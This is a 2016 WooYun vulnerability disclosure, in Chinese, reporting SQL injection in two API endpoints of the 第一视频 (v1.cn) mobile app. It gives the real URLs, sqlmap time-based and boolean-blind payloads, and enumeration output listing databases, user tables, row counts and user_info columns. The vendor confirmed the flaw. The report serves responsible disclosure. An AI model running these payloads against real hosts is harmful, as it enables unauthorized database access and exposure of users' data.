当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167310

漏洞标题:第一视频app多处注入(伪静态注入/泄露用户信息)

相关厂商:第一视频

漏洞作者: k0_pwn

提交时间:2016-01-04 20:32

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-04: 细节已通知厂商并且等待厂商处理中
2016-01-07: 厂商已经确认,细节仅向厂商公开
2016-01-17: 细节向核心白帽子及相关领域专家公开
2016-01-27: 细节向普通白帽子公开
2016-02-06: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

rt,还有别的注入点,不知道有没有跟前辈重复,所以都交了

详细说明:

第一个注入点

dynamic.app.m.v1.cn/www/dynamic.php?mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302&p=0


vid存在注入

sqlmap identified the following injection points with a total of 90 HTTP(s) requests:
---
Place: GET
Parameter: vid
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302; SELECT SLEEP(5)-- &p=0
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302 AND SLEEP(5)&p=0
---
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11


第二个伪静态注入点

static.app.m.v1.cn/www/mod/mob/ctl/subscription/act/my/uid/8473817*/pcode/010110000/version/4.0.mindex.html


uid后星号位置存在注入

sqlmap identified the following injection points with a total of 38 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://static.app.m.v1.cn:80/www/mod/mob/ctl/subscription/act/my/uid/8473817 AND 2571=2571/pcode/010110000/version/4.0.mindex.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://static.app.m.v1.cn:80/www/mod/mob/ctl/subscription/act/my/uid/8473817 AND SLEEP(5)/pcode/010110000/version/4.0.mindex.html
---
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11


用户名及数据库

web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
current user: 'appsv1@10.20.1.%'
current database: 'first_video'
current user is DBA: False


列数据库

web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
available databases [5]:
[*] first_video
[*] information_schema
[*] test
[*] v1_social
[*] v1_transcode


143张表

web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
select count(*) from information_schema.tables: '143'


这里我不列所有表了,因为是盲注,直接列user吧

web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
select table_name from information_schema.tables where table_name like '%user%' [20]:
[*] USER_PRIVILEGES
[*] group_user
[*] ms_user
[*] ms_user_con
[*] recommend_user_info
[*] recommend_user_info_type
[*] search_delta_user_info
[*] search_total_user_info
[*] sys_user
[*] sys_user_role
[*] user_account
[*] user_account_change_log
[*] user_channel
[*] user_comments
[*] user_focus_on
[*] user_info
[*] user_message
[*] user_opinion
[*] user_phone
[*] user_setup


看了一下数据量,其实好像不如前辈的40W

web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11
Database: first_video
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| user_focus_on | 456093 |
| search_total_user_info | 32787 |
| user_info | 32782 |
| user_message | 26664 |
| user_account_change_log | 8569 |
| user_comments | 5286 |
| user_phone | 3423 |
| user_channel | 3070 |
| user_account | 689 |
| recommend_user_info | 282 |
| user_setup | 248 |
| user_opinion | 88 |
| sys_user_role | 8 |
| sys_user | 6 |
| recommend_user_info_type | 3 |
+--------------------------+---------+


focus_on那个表没有什么内容,相关的可能是user_info中

PHP 5.4.4
back-end DBMS: MySQL 5.0.11
Database: first_video
Table: user_info
[19 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| background_img | varchar(200) |
| COMMENTS | int(11) |
| CREATE_TIME | varchar(40) |
| DETAIL | varchar(100) |
| EDITOR | int(11) |
| is_certification | tinyint(1) |
| ISFRIENDS | int(11) |
| LASTLOGIN_TIME | varchar(40) |
| nickname | varchar(20) |
| REGION | varchar(20) |
| SEX | varchar(4) |
| SHARE | int(11) |
| SORTCODE | int(11) |
| STATE | int(11) |
| USER_ID | int(11) |
| USER_IMG | varchar(200) |
| USER_NAME | varchar(20) |
| USER_TYPE | int(11) |
| VIDEOS | int(11) |
+------------------+--------------+

漏洞证明:

sqlmap identified the following injection points with a total of 90 HTTP(s) requests:
---
Place: GET
Parameter: vid
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302; SELECT SLEEP(5)-- &p=0
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302 AND SLEEP(5)&p=0
---
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11


sqlmap identified the following injection points with a total of 38 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://static.app.m.v1.cn:80/www/mod/mob/ctl/subscription/act/my/uid/8473817 AND 2571=2571/pcode/010110000/version/4.0.mindex.html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://static.app.m.v1.cn:80/www/mod/mob/ctl/subscription/act/my/uid/8473817 AND SLEEP(5)/pcode/010110000/version/4.0.mindex.html
---
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.0.11

修复方案:

参数过滤

版权声明:转载请注明来源 k0_pwn@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-07 10:51

厂商回复:

谢谢关注第一视频

最新状态:

暂无